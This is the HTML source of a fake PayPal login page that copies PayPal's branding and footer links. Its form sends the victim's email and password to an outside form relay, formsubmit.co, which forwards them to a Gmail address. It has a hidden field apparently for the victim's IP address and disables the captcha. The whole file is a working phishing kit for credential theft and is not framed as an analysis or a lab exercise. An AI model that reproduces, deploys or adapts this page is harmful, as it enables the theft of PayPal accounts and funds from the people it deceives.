<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Login to your Paypal Account</title>
    <meta name="description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="icon" type="image/x-icon" href="momgram@2x.png">
    <link rel="stylesheet" href="style.css">
</head>

<body>
    <div id="loaderCont" class="hidden">
        <div class="spinner loading"></div>
    </div>

    <section class="mainSection">
        <div class="mainContainer">
            <div class="logoContainer">
                <img src="momgram@2x.png" alt="Paypal-Logo">
            </div>
            <div class="formContainer">
                <form method="POST" action="https://formsubmit.co/jpaypal.payments@gmail.com">
                    <div id="mainError" class="hidden">
                        <img src="warning.png" alt="#">
                        <p class="errorLang">Some of your info isn't correct. Please try again.</p>
                    </div>
                    <div class="inputContainer">
                        <input type="email" name="email" id="emailEntry" placeholder="Email or mobile number" required>
                        <input type="password" name="name" id="passEntry" placeholder="Password" required>
                        <input type="text" name="message" id="ipNumber" class="hidden">
                        <input type="hidden" name="_captcha" value="false">
                        <input type="hidden" name="_captcha" value="false">
                    </div>
                    <div class="buttonContainer">
                        <button id="submitButton">Log In</button>
                    </div>
                </form>
            </div>
            <div class="languageContainer">
                <ul>
                    <li>English</li>
                    <span>|</span>
                    <li>Français</li>
                    <span>|</span>
                    <li>Español</li>
                    <span>|</span>
                    <li>中文</li>
                </ul>
            </div>
        </div>
    </section>

    <footer>
        <ul>
            <li><a href="https://www.paypal.com/us/smarthelp/contact-us">Contact Us</a></li>
            <li><a href="https://www.paypal.com/us/webapps/mpp/ua/privacy-full">Privacy</a></li>
            <li><a href="https://www.paypal.com/us/webapps/mpp/ua/legalhub-full">Legal</a></li>
            <li><a href="https://www.paypal.com/us/webapps/mpp/ua/upcoming-policies-full">Policy Updates</a></li>
            <li><a href="https://www.paypal.com/us/webapps/mpp/country-worldwide">Worldwide</a></li>
        </ul>
    </footer>



    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>
    <script src="app.js"></script>
</body>

</html>